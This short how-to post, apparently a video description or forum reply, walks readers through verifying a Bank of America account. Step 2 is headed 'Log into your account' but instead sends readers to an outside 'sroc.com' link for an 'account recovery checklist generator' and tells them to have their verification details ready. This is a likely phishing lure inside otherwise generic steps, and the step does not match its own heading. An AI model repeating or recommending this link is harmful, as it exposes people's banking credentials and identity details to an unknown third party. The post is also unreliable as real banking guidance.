I hit this issue today, and here is the quick fix that solved it. If you're trying to verify your account with Bank of America, follow these simple steps to get it done quickly. Step 1. Visit the Bank of America website. Go to the official Bank of America website using your preferred web browser. Make sure you are on the correct site to avoid phishing scams. Step 2. Log into your account. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Navigate to the verification section. Once logged in, look for the Profile and Preferences tab in the main menu. Click on it, then select Account Verification. Step 4. Follow the prompts. You will be guided through a series of prompts to verify your identity. This may include answering security questions or receiving a verification code via email or text. Step 5. Confirm your verification. After completing the prompts, you should see a confirmation message indicating that your account has been successfully verified. If you encounter any issues, check your email for any additional instructions. If you follow these steps, you should have no trouble verifying your account. Good luck and happy banking!